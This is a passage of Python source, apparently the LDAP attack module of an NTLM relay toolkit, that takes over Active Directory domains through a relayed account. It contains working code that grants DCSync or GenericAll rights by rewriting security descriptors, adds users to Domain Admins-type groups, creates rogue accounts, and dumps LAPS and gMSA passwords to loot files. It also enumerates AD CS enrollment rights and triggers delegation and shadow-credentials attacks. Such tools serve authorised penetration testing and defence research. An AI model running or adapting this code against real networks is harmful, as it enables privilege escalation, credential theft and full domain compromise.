                LOG.error(f'{self.args.rights} right is not valid')
                return
        else:
            #accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
            accesstype = 983551
            for guid in rights[self.args.rights]:
                if not self.dacl_remove_ace(secDesc, guid, usersid, accesstype):
                    LOG.error(f'ACE not found in {self.args.targetidentity}')
                    return

        dn = entry.entry_dn
        data = secDesc.getData()
        self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
        if self.client.result['result'] == 0:
            if not self.args.delete:
                if self.args.rights == 'dcsync':
                    LOG.info('Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)
                elif self.args.rights == 'writemembers':
                    LOG.info('Success! User %s now has "Add/Remove Self as Member" privileges on %s', username, self.args.targetidentity)
                elif self.args.rights == 'resetpassword':
                    LOG.info('Success! User %s now has Reset Password privileges on %s', username, self.args.targetidentity)
                elif self.args.rights == 'all':
                    LOG.info('Success! User %s now has GenericAll privileges on %s', username, self.args.targetidentity)
            else:
                if self.args.rights == 'dcsync':
                    LOG.info('Success! Replication-Get-Changes-All privileges restored for %s', username)
                elif self.args.rights == 'writemembers':
                    LOG.info('Success! GenericWrite privileges restored for %s', username)
                elif self.args.rights == 'resetpassword':
                    LOG.info('Success! Reset Password privileges restored for %s', username)
                elif self.args.rights == 'all':
                    LOG.info('Success! GenericAll privileges restored for %s', username)


            # Query the SD again to see what AD made of it
            self.client.search(self.rootDN, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
            entry = self.client.entries[0]
            newSD = entry['nTSecurityDescriptor'].raw_values[0]
            return True
        else:
            LOG.error('Error when updating ACL: %s' % self.client.result)
            return False

    def validatePrivileges(self, uname, domainDumper):
        # Find the user's DN
        membersids = []
        sidmapping = {}
        privs = {
            'create': False, # Whether we can create users
            'createIn': None, # Where we can create users
            'escalateViaGroup': False, # Whether we can escalate via a group
            'escalateGroup': None, # The group we can escalate via
            'aclEscalate': False, # Whether we can escalate via ACL on the domain object
            'aclEscalateIn': None # The object which ACL we can edit
        }
        self.client.search(domainDumper.root, '(sAMAccountName=%s)' % escape_filter_chars(uname), attributes=['objectSid', 'primaryGroupId'])
        user = self.client.entries[0]
        usersid = user['objectSid'].value
        sidmapping[usersid] = user.entry_dn
        membersids.append(usersid)
        # The groups the user is a member of
        self.client.search(domainDumper.root, '(member:1.2.840.113556.1.4.1941:=%s)' % escape_filter_chars(user.entry_dn), attributes=['name', 'objectSid'])
        LOG.debug('User is a member of: %s' % self.client.entries)
        for entry in self.client.entries:
            sidmapping[entry['objectSid'].value] = entry.entry_dn
            membersids.append(entry['objectSid'].value)
        # Also search by primarygroupid
        # First get domain SID
        self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
        domainsid = self.client.entries[0]['objectSid'].value
        gid = user['primaryGroupId'].value
        # Now search for this group by SID
        self.client.search(domainDumper.root, '(objectSid=%s-%d)' % (domainsid, gid), attributes=['name', 'objectSid', 'distinguishedName'])
        group = self.client.entries[0]
        LOG.debug('User is a member of: %s' % self.client.entries)
        # Add the group sid of the primary group to the list
        sidmapping[group['objectSid'].value] = group.entry_dn
        membersids.append(group['objectSid'].value)
        controls = security_descriptor_control(sdflags=0x05) # Query Owner and Dacl
        # Now we have all the SIDs applicable to this user, now enumerate the privileges of domains and OUs
        entries = self.client.extend.standard.paged_search(domainDumper.root, '(|(objectClass=domain)(objectClass=organizationalUnit))', attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls, generator=True)
        self.checkSecurityDescriptors(entries, privs, membersids, sidmapping, domainDumper)
        # Also get the privileges on the default Users container
        entries = self.client.extend.standard.paged_search(domainDumper.root, '(&(cn=Users)(objectClass=container))', attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls, generator=True)
        self.checkSecurityDescriptors(entries, privs, membersids, sidmapping, domainDumper)

        # Interesting groups we'd like to be a member of, in order of preference
        interestingGroups = [
            '%s-%d' % (domainsid, 519), # Enterprise admins
            '%s-%d' % (domainsid, 512), # Domain admins
            'S-1-5-32-544', # Built-in Administrators
            'S-1-5-32-551', # Backup operators
            'S-1-5-32-548', # Account operators
        ]
        privs['escalateViaGroup'] = False
        for group in interestingGroups:
            self.client.search(domainDumper.root, '(objectSid=%s)' % group, attributes=['nTSecurityDescriptor', 'objectClass'], controls=controls)
            groupdata = self.client.response
            self.checkSecurityDescriptors(groupdata, privs, membersids, sidmapping, domainDumper)
            if privs['escalateViaGroup']:
                # We have a result - exit the loop
                break
        return (usersid, privs)

    def getUserInfo(self, samname):
        entries = self.client.search(self.rootDN, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
        try:
            dn = self.client.entries[0].entry_dn
            sid = format_sid(self.client.entries[0]['objectSid'])
            return (dn, sid)
        except IndexError:
            LOG.error('User not found in LDAP: %s' % samname)
            return False

    def checkSecurityDescriptors(self, entries, privs, membersids, sidmapping, domainDumper):
        standardrights = [
            self.GENERIC_ALL,
            self.GENERIC_WRITE,
            self.GENERIC_READ,
            ACCESS_MASK.WRITE_DACL
        ]
        for entry in entries:
            if entry['type'] != 'searchResEntry':
                continue
            dn = entry['dn']
            try:
                sdData = entry['raw_attributes']['nTSecurityDescriptor'][0]
            except IndexError:
                # We don't have the privileges to read this security descriptor
                LOG.debug('Access to security descriptor was denied for DN %s', dn)
                continue
            hasFullControl = False
            secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR()
            secDesc.fromString(sdData)
            if secDesc['OwnerSid'] != '' and secDesc['OwnerSid'].formatCanonical() in membersids:
                sid = secDesc['OwnerSid'].formatCanonical()
                LOG.debug('Permission found: Full Control on %s; Reason: Owner via %s' % (dn, sidmapping[sid]))
                hasFullControl = True
            # Iterate over all the ACEs
            for ace in secDesc['Dacl'].aces:
                sid = ace['Ace']['Sid'].formatCanonical()
                if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE and ace['AceType'] != ACCESS_ALLOWED_ACE.ACE_TYPE:
                    continue
                if not ace.hasFlag(ACE.INHERITED_ACE) and ace.hasFlag(ACE.INHERIT_ONLY_ACE):
                    # ACE is set on this object, but only inherited, so not applicable to us
                    continue

                # Check if the ACE has restrictions on object type (inherited case)
                if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \
                    and ace.hasFlag(ACE.INHERITED_ACE) \
                    and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT):
                    # Verify if the ACE applies to this object type
                    inheritedObjectType = bin_to_string(ace['Ace']['InheritedObjectType']).lower()
                    if not self.aceApplies(inheritedObjectType, entry['raw_attributes']['objectClass'][-1]):
                        continue
                # Check for non-extended rights that may not apply to us
                if ace['Ace']['Mask']['Mask'] in standardrights or ace['Ace']['Mask'].hasPriv(ACCESS_MASK.WRITE_DACL):
                    # Check if this applies to our objecttype
                    if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE  and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT):
                        objectType = bin_to_string(ace['Ace']['ObjectType']).lower()
                        if not self.aceApplies(objectType, entry['raw_attributes']['objectClass'][-1]):
                            # LOG.debug('ACE does not apply, only to %s', objectType)
                            continue
                if sid in membersids:
                    # Generic all
                    if ace['Ace']['Mask'].hasPriv(self.GENERIC_ALL):
                        LOG.debug('Permission found: Full Control on %s; Reason: GENERIC_ALL via %s' % (dn, sidmapping[sid]))
                        hasFullControl = True
                    if can_create_users(ace) or hasFullControl:
                        if not hasFullControl:
                            LOG.debug('Permission found: Create users in %s; Reason: Granted to %s' % (dn, sidmapping[sid]))
                        if dn == 'CN=Users,%s' % domainDumper.root:
                            # We can create users in the default container, this is preferred
                            privs['create'] = True
                            privs['createIn'] = dn
                        else:
                            # Could be a different OU where we have access
                            # store it until we find a better place
                            if privs['createIn'] != 'CN=Users,%s' % domainDumper.root and b'organizationalUnit' in entry['raw_attributes']['objectClass']:
                                privs['create'] = True
                                privs['createIn'] = dn
                    if can_add_member(ace) or hasFullControl:
                        if b'group' in entry['raw_attributes']['objectClass']:
                            # We can add members to a group
                            if not hasFullControl:
                                LOG.debug('Permission found: Add member to %s; Reason: Granted to %s' % (dn, sidmapping[sid]))
                            privs['escalateViaGroup'] = True
                            privs['escalateGroup'] = dn
                    if ace['Ace']['Mask'].hasPriv(ACCESS_MASK.WRITE_DACL) or hasFullControl:
                        # Check if the ACE is an OBJECT ACE, if so the WRITE_DACL is applied to
                        # a property, which is both weird and useless, so we skip it
                        if ace['AceType'] == ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE \
                            and ace['Ace'].hasFlag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT):
                            # LOG.debug('Skipping WRITE_DACL since it has an ObjectType set')
                            continue
                        if not hasFullControl:
                            LOG.debug('Permission found: Write Dacl of %s; Reason: Granted to %s' % (dn, sidmapping[sid]))
                        # We can modify the domain Dacl
                        if b'domain' in entry['raw_attributes']['objectClass']:
                            privs['aclEscalate'] = True
                            privs['aclEscalateIn'] = dn

    @staticmethod
    def aceApplies(ace_guid, object_class):
        '''
        Checks if an ACE applies to this object (based on object classes).
        Note that this function assumes you already verified that InheritedObjectType is set (via the flag).
        If this is not set, the ACE applies to all object types.
        '''
        try:
            our_ace_guid = OBJECTTYPE_GUID_MAP[object_class]
        except KeyError:
            return False
        if ace_guid == our_ace_guid:
            return True
        # If none of these match, the ACE does not apply to this object
        return False

    def dumpADCS(self):

        def is_template_for_authentification(entry):
            authentication_ekus = [b"1.3.6.1.5.5.7.3.2", b"1.3.6.1.5.2.3.4", b"1.3.6.1.4.1.311.20.2.2", b"2.5.29.37.0"]

            # Ignore templates requiring manager approval
            if entry["attributes"]["msPKI-Enrollment-Flag"] & 0x02:
                return False

            # No EKU = works for client authentication
            if not len(entry["raw_attributes"]["pKIExtendedKeyUsage"]):
                return True

            try:
                next((eku for eku in entry["raw_attributes"]["pKIExtendedKeyUsage"] if eku in authentication_ekus))
                return True
            except StopIteration:
                return False

        def get_enrollment_principals(entry):
            # Mostly taken from github.com/ly4k/Certipy/certipy/security.py
            sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
            sd.fromString(entry["raw_attributes"]["nTSecurityDescriptor"][0])

            enrollment_uuids = [
                "00000000-0000-0000-0000-000000000000", # All-Extended-Rights
                "0e10c968-78fb-11d2-90d4-00c04f79dc55", # Certificate-Enrollment
                "a05b8cc2-17bc-4802-a710-e7c15ab866a2", # Certificate-AutoEnrollment
            ]

            enrollment_principals = set()

            for ace in (a for a in sd["Dacl"]["Data"] if a["AceType"] == ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE):
                sid = format_sid(ace["Ace"]["Sid"].getData())
                if ace["Ace"]["ObjectTypeLen"] == 0:
                    uuid = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
                else:
                    uuid = bin_to_string(ace["Ace"]["ObjectType"]).lower()

                if not uuid in enrollment_uuids:
                    continue

                enrollment_principals.add(sid)

            return enrollment_principals

        def translate_sids(sids):
            default_naming_context = self.client.server.info.other["defaultNamingContext"][0]
            try:
                domain_fqdn = self.client.server.info.other["ldapServiceName"][0].split("@")[1]
            except (KeyError, IndexError):
                domain_fqdn = ""

            sid_map = dict()

            for sid in sids:
                try:
                    if sid.startswith("S-1-5-21-"):
                        self.client.search(default_naming_context, "(&(objectSid=%s)(|(objectClass=group)(objectClass=user)))" % sid,
                                    attributes=["name", "objectSid"], search_scope=ldap3.SUBTREE)
                    else:
                        self.client.search("CN=WellKnown Security Principals," + configuration_naming_context,
                                    "(&(objectSid=%s)(objectClass=foreignSecurityPrincipal))" % sid, attributes=["name", "objectSid"],
                                    search_scope=ldap3.LEVEL)
                except:
                    sid_map[sid] = sid
                    continue

                if not len(self.client.response):
                    sid_map[sid] = sid
                else:
                    sid_map[sid] = domain_fqdn + "\\" + self.client.response[0]["attributes"]["name"]

            return sid_map


        LOG.info("Attempting to dump ADCS enrollment services info")

        configuration_naming_context = self.client.server.info.other['configurationNamingContext'][0]

        enrollment_service_attributes = ["certificateTemplates", "displayName", "dNSHostName", "msPKI-Enrollment-Servers", "nTSecurityDescriptor"]
        self.client.search("CN=Enrollment Services,CN=Public Key Services,CN=Services," + configuration_naming_context,
                           "(objectClass=pKIEnrollmentService)", search_scope=ldap3.LEVEL, attributes=enrollment_service_attributes,
                           controls=security_descriptor_control(sdflags=0x04))

        if not len(self.client.response):
            LOG.info("No ADCS enrollment service found")
            return

        offered_templates = set()
        sid_map = dict()
        for entry in self.client.response:
            LOG.info("Found ADCS enrollment service `%s` on host `%s`, offering templates: %s" % (entry["attributes"]["displayName"],
                     entry["attributes"]["dNSHostName"], ", ".join(("`" + tpl + "`" for tpl in entry["attributes"]["certificateTemplates"]))))

            offered_templates.update(entry["attributes"]["certificateTemplates"])
            enrollment_principals = get_enrollment_principals(entry)

            known_sids = set(sid_map.keys())
            unknwown_sids = enrollment_principals.difference(known_sids)
            sid_map.update(translate_sids(unknwown_sids))

            LOG.info("Principals who can enroll on enrollment service `%s`: %s" % (entry["attributes"]["displayName"],
                     ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))

        if not len(offered_templates):
            LOG.info("No templates offered by the enrollment services")
            return

        LOG.info("Attempting to dump ADCS certificate templates enrollment rights, for templates allowing for client authentication and not requiring manager approval")

        certificate_template_attributes = ["msPKI-Enrollment-Flag", "name", "nTSecurityDescriptor", "pKIExtendedKeyUsage"]
        self.client.search("CN=Certificate Templates,CN=Public Key Services,CN=Services," + configuration_naming_context,
                           "(&(objectClass=pKICertificateTemplate)(|%s))" % "".join(("(name=" + escape_filter_chars(tpl) + ")" for tpl in offered_templates)),
                           search_scope=ldap3.LEVEL, attributes=certificate_template_attributes,
                           controls=security_descriptor_control(sdflags=0x04))

        for entry in (e for e in self.client.response if is_template_for_authentification(e)):
            enrollment_principals = get_enrollment_principals(entry)

            known_sids = set(sid_map.keys())
            unknwown_sids = enrollment_principals.difference(known_sids)
            sid_map.update(translate_sids(unknwown_sids))

            LOG.info("Principals who can enroll using template `%s`: %s" % (entry["attributes"]["name"],
                     ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))


    def run(self):
        #self.client.search('dc=vulnerable,dc=contoso,dc=com', '(objectclass=person)')
        #print self.client.entries
        global dumpedDomain
        global dumpedAdcs
        # Set up a default config
        domainDumpConfig = ldapdomaindump.domainDumpConfig()

        # Change the output directory to configured rootdir
        domainDumpConfig.basepath = self.config.lootdir

        # Create new dumper object
        domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)

        if self.config.interactive:
            if self.tcp_shell is not None:
                LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
                # Start listening and launch interactive shell.
                self.tcp_shell.listen()
                ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
                ldap_shell.cmdloop()
                return

        # If specified validate the user's privileges. This might take a while on large domains but will
        # identify the proper containers for escalating via the different techniques.
        if self.config.validateprivs:
            LOG.info('Enumerating relayed user\'s privileges. This may take a while on large domains')
            userSid, privs = self.validatePrivileges(self.username, domainDumper)
            if privs['create']:
                LOG.info('User privileges found: Create user')
            if privs['escalateViaGroup']:
                name = privs['escalateGroup'].split(',')[0][3:]
                LOG.info('User privileges found: Adding user to a privileged group (%s)' % name)
            if privs['aclEscalate']:
                LOG.info('User privileges found: Modifying domain ACL')

        # If validation of privileges is not desired, we assumed that the user has permissions to escalate
        # an existing user via ACL attacks.
        else:
            LOG.info('Assuming relayed user has privileges to escalate a user via ACL attack')
            privs = dict()
            privs['create'] = False
            privs['aclEscalate'] = True
            privs['escalateViaGroup'] = False

        # We prefer ACL escalation since it is more quiet
        if self.config.aclattack and privs['aclEscalate']:
            LOG.debug('Performing ACL attack')
            if self.config.escalateuser:
                # We can escalate an existing user
                result = self.getUserInfo(domainDumper, self.config.escalateuser)
                # Unless that account does not exist of course
                if not result:
                    LOG.error('Unable to escalate without a valid user.')
                else:
                    userDn, userSid = result
                    # Perform the ACL attack
                    self.aclAttack(userDn, domainDumper)
            elif privs['create']:
                # Create a nice shiny new user for the escalation
                userDn = self.addUser(privs['createIn'], domainDumper)
                if not userDn:
                    LOG.error('Unable to escalate without a valid user.')
                # Perform the ACL attack
                else:
                    self.aclAttack(userDn, domainDumper)
            else:
                LOG.error('Cannot perform ACL escalation because we do not have create user '\
                    'privileges. Specify a user to assign privileges to with --escalate-user')

        # If we can't ACL escalate, try adding us to a privileged group
        if self.config.addda and privs['escalateViaGroup']:
            LOG.debug('Performing Group attack')
            if self.config.escalateuser:
                # We can escalate an existing user
                result = self.getUserInfo(domainDumper, self.config.escalateuser)
                # Unless that account does not exist of course
                if not result:
                    LOG.error('Unable to escalate without a valid user.')
                # Perform the Group attack
                else:
                    userDn, userSid = result
                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])

            elif privs['create']:
                # Create a nice shiny new user for the escalation
                userDn = self.addUser(privs['createIn'], domainDumper)
                if not userDn:
                    LOG.error('Unable to escalate without a valid user, aborting.')
                # Perform the Group attack
                else:
                    self.addUserToGroup(userDn, domainDumper, privs['escalateGroup'])

            else:
                LOG.error('Cannot perform ACL escalation because we do not have create user '\
                          'privileges. Specify a user to assign privileges to with --escalate-user')

        # Dump LAPS Passwords
        if self.config.dumplaps:
            LOG.info("Attempting to dump LAPS passwords")

            success = self.client.search(domainDumper.root, '(&(objectCategory=computer))', search_scope=ldap3.SUBTREE, attributes=['DistinguishedName','ms-MCS-AdmPwd'])

            if success:

                fd = None
                filename = "laps-dump-" + self.username + "-" + str(random.randint(0, 99999))
                count = 0

                for entry in self.client.response:
                    try:
                        dn = "DN:" + entry['attributes']['distinguishedname']
                        passwd = "Password:" + entry['attributes']['ms-MCS-AdmPwd']

                        if fd is None:
                            fd = open(filename, "a+")

                        count += 1

                        LOG.debug(dn)
                        LOG.debug(passwd)

                        fd.write(dn)
                        fd.write("\n")
                        fd.write(passwd)
                        fd.write("\n")

                    except:
                        continue

                if fd is None:
                    LOG.info("The relayed user %s does not have permissions to read any LAPS passwords" % self.username)
                else:
                    LOG.info("Successfully dumped %d LAPS passwords through relayed account %s" % (count, self.username))
                    fd.close()

        #Dump gMSA Passwords
        if self.config.dumpgmsa:
            LOG.info("Attempting to dump gMSA passwords")

            if not self.client.tls_started and not self.client.server.ssl:
                LOG.info('Dumping gMSA password requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS')
                if not self.client.start_tls():
                    LOG.error('StartTLS failed')
                    return False

            success = self.client.search(domainDumper.root, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])
            if success:
                fd = None
                filename = "gmsa-dump-" + self.username + "-" + str(random.randint(0, 99999))
                count = 0
                for entry in self.client.response:
                    try:
                        sam = entry['attributes']['sAMAccountName']
                        data = entry['attributes']['msDS-ManagedPassword']
                        blob = MSDS_MANAGEDPASSWORD_BLOB()
                        blob.fromString(data)
                        hash = MD4.new ()
                        hash.update (blob['CurrentPassword'][:-2])
                        passwd = binascii.hexlify(hash.digest()).decode("utf-8")
                        userpass = sam + ':::' + passwd
                        LOG.info(userpass)
                        count += 1
                        if fd is None:
                            fd = open(filename, "a+")
                        fd.write(userpass)
                        fd.write("\n")
                    except:
                        continue
                if fd is None:
                    LOG.info("The relayed user %s does not have permissions to read any gMSA passwords" % self.username)
                else:
                    LOG.info("Successfully dumped %d gMSA passwords through relayed account %s" % (count, self.username))
                    fd.close()

        if not dumpedAdcs and self.config.dumpadcs:
            dumpedAdcs = True
            self.dumpADCS()
            LOG.info("Done dumping ADCS info")

        # Perform the Delegate attack if it is enabled and we relayed a computer account
        if self.config.delegateaccess and self.username[-1] == '$':
            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
            return

        # Add a new computer if that is requested
        # privileges required are not yet enumerated, neither is ms-ds-MachineAccountQuota
        if self.config.addcomputer is not None:
            self.client.search(domainDumper.root, "(ObjectClass=domain)", attributes=['wellKnownObjects'])
            # Computer well-known GUID
            # https://social.technet.microsoft.com/Forums/windowsserver/en-US/d028952f-a25a-42e6-99c5-28beae2d3ac3/how-can-i-know-the-default-computer-container?forum=winservergen
            computerscontainer = [
                entry.decode('utf-8').split(":")[-1] for entry in self.client.entries[0]["wellKnownObjects"]
                if b"AA312825768811D1ADED00C04FD8D5CD" in entry
            ][0]
            LOG.debug("Computer container is {}".format(computerscontainer))
            self.addComputer(computerscontainer, domainDumper)
            return

        # Perform the Shadow Credentials attack if it is enabled
        if self.config.IsShadowCredentialsAttack:
            self.shadowCredentialsAttack(domainDumper)
            return

        # Last attack, dump the domain if no special privileges are present
        if not dumpedDomain and self.config.dumpdomain:
            # Do this before the dump is complete because of the time this can take
            dumpedDomain = True
            LOG.info('Dumping domain info for first time')
            domainDumper.domainDump()
            LOG.info('Domain info dumped into lootdir!')

# Builds a standard ACE for a specified access mask (rights) and a specified SID (the principal who obtains the right)
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb
#   - access_mask : the allowed access mask
#   - sid : the principal's SID
#   - ace_type : the ACE type (allowed or denied)
def create_ace(access_mask, sid, ace_type, aceflags=0x00):
    nace = ldaptypes.ACE()
    nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    nace['AceFlags'] = aceflags
    acedata = ldaptypes.ACCESS_ALLOWED_ACE()
    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    acedata['Mask']['Mask'] = access_mask
    acedata['Sid'] = ldaptypes.LDAP_SID()
    acedata['Sid'].fromCanonical(sid)
    nace['Ace'] = acedata
    logging.debug('ACE created.')
    return nace

# Create an object ACE with the specified privguid and our sid
def create_object_ace(privguid, sid, aceflags=0x00):
    nace = ldaptypes.ACE()
    nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    nace['AceFlags'] = aceflags # inherit to child objects
    acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    #acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    if privguid == EXTENDED_RIGHTS_NAME_MAP['Self-Membership']:
        acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP + ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
    else:
        acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    #acedata['Mask']['Mask'] = 983551 # Full control
    acedata['ObjectType'] = string_to_bin(privguid)
    acedata['InheritedObjectType'] = b''
    acedata['Sid'] = ldaptypes.LDAP_SID()
    acedata['Sid'].fromCanonical(sid)
    assert sid == acedata['Sid'].formatCanonical()
    acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
    nace['Ace'] = acedata
    return nace

# Create an ALLOW ACE with the specified sid
def create_allow_ace(sid, aceflags=0x00):
    nace = ldaptypes.ACE()
    nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
    nace['AceFlags'] = aceflags
    acedata = ldaptypes.ACCESS_ALLOWED_ACE()
    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    acedata['Sid'] = ldaptypes.LDAP_SID()
    acedata['Sid'].fromCanonical(sid)
    nace['Ace'] = acedata
    return nace

def create_empty_sd():
    sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
    sd['Revision'] = b'\x01'
    sd['Sbz1'] = b'\x00'
    sd['Control'] = 32772
    sd['OwnerSid'] = ldaptypes.LDAP_SID()
    # BUILTIN\Administrators
    sd['OwnerSid'].fromCanonical('S-1-5-32-544')
    sd['GroupSid'] = b''
    sd['Sacl'] = b''
    acl = ldaptypes.ACL()
    acl['AclRevision'] = 4
    acl['Sbz1'] = 0
    acl['Sbz2'] = 0
    acl.aces = []
    sd['Dacl'] = acl
    return sd

# Check if an ACE allows for creation of users
def can_create_users(ace):
    createprivs = ace['Ace']['Mask'].hasPriv(ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD)
    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == b'':
        return False
    userprivs = bin_to_string(ace['Ace']['ObjectType']).lower() == 'bf967aba-0de6-11d0-a285-00aa003049e2'
    return createprivs and userprivs

# Check if an ACE allows for adding members
def can_add_member(ace):
    writeprivs = ace['Ace']['Mask'].hasPriv(ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP)
    if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE or ace['Ace']['ObjectType'] == b'':
        return writeprivs
    userprivs = bin_to_string(ace['Ace']['ObjectType']).lower() == 'bf9679c0-0de6-11d0-a285-00aa003049e2'
    return writeprivs and userprivs

class ADUser:
    def __init__(self, client, root_dn, parent=None):
        if parent:
            self.__parent = parent
        self.__client = client
        self.__root_dn = root_dn

    def removeUser(self, user_dn):
        if not user_dn:
            LOG.error('User distinguishedName is required')
            return

        if self.__client.delete(user_dn):
            LOG.info(f'Successfully removed {user_dn} from domain')
            return True
        else:
            return False

    def addUser(self, newUser=None, newPassword=None):
        """
        Add a new user. Parent is preferably CN=Users,DC=Domain,DC=local, but can
        also be an OU or other container where we have write privileges
        """
        if not self.__client.tls_started and not self.__client.server.ssl:
            LOG.info('Adding a user account to the domain requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS')
            if not self.__client.start_tls():
                LOG.error('StartTLS failed')
                return False

        # Random password
        if not newPassword:
            newPassword = ''.join(random.choice(string.ascii_letters + string.digits + '.,;:!$-_+/*(){}#@<>^') for _ in range(15))

        # Random username
        if not newUser:
            newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))

        newUserDn = 'CN=%s,%s' % (newUser, self.__parent)
        ucd = {
            'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % self.__root_dn,
            'distinguishedName': newUserDn,
            'cn': newUser,
            'sn': newUser,
            'givenName': newUser,
            'displayName': newUser,
            'name': newUser,
            'userAccountControl': 512,
            'accountExpires': '0',
            'sAMAccountName': newUser,
            'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le'),
        }
        LOG.info('Attempting to create user in: %s', self.__parent)
        res = self.__client.add(newUserDn, ['top', 'person', 'organizationalPerson', 'user'], ucd)
        if not res:
            # Adding users requires LDAPS
            if self.__client.result['result'] == RESULT_UNWILLING_TO_PERFORM and not self.__client.server.ssl:
                LOG.error('Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.')
            else:
                LOG.error('Failed to add a new user: %s' % str(self.__client.result['message']))
            return False
        else:
            LOG.info('Adding new user with username: %s and password: %s result: OK' % (newUser, newPassword))

            # Return the DN
            return newUserDn

class ACE_FLAGS(Enum):
    CONTAINER_INHERIT_ACE = ACE.CONTAINER_INHERIT_ACE
    FAILED_ACCESS_ACE_FLAG = ACE.FAILED_ACCESS_ACE_FLAG
    INHERIT_ONLY_ACE = ACE.INHERIT_ONLY_ACE
    INHERITED_ACE = ACE.INHERITED_ACE
    NO_PROPAGATE_INHERIT_ACE = ACE.NO_PROPAGATE_INHERIT_ACE
    OBJECT_INHERIT_ACE = ACE.OBJECT_INHERIT_ACE
    SUCCESSFUL_ACCESS_ACE_FLAG = ACE.SUCCESSFUL_ACCESS_ACE_FLAG

class OBJECT_ACE_FLAGS(Enum):
    ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
    ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT

class ACCESS_MASK(Enum):
    # Generic Rights
    GenericRead = 0x80000000 # ADS_RIGHT_GENERIC_READ
    GenericWrite = 0x40000000 # ADS_RIGHT_GENERIC_WRITE
    GenericExecute = 0x20000000 # ADS_RIGHT_GENERIC_EXECUTE
    GenericAll = 0x10000000 # ADS_RIGHT_GENERIC_ALL

    # Maximum Allowed access type
    MaximumAllowed = 0x02000000

    # Access System Acl access type
    AccessSystemSecurity = 0x01000000 # ADS_RIGHT_ACCESS_SYSTEM_SECURITY

    # Standard access types
    Synchronize = 0x00100000 # ADS_RIGHT_SYNCHRONIZE
    WriteOwner = 0x00080000 # ADS_RIGHT_WRITE_OWNER
    WriteDACL = 0x00040000 # ADS_RIGHT_WRITE_DAC
    ReadControl = 0x00020000 # ADS_RIGHT_READ_CONTROL
    Delete = 0x00010000 # ADS_RIGHT_DELETE

    # Specific rights
    AllExtendedRights = 0x00000100 # ADS_RIGHT_DS_CONTROL_ACCESS
    ListObject = 0x00000080 # ADS_RIGHT_DS_LIST_OBJECT
    DeleteTree = 0x00000040 # ADS_RIGHT_DS_DELETE_TREE
    WriteProperties = 0x00000020 # ADS_RIGHT_DS_WRITE_PROP
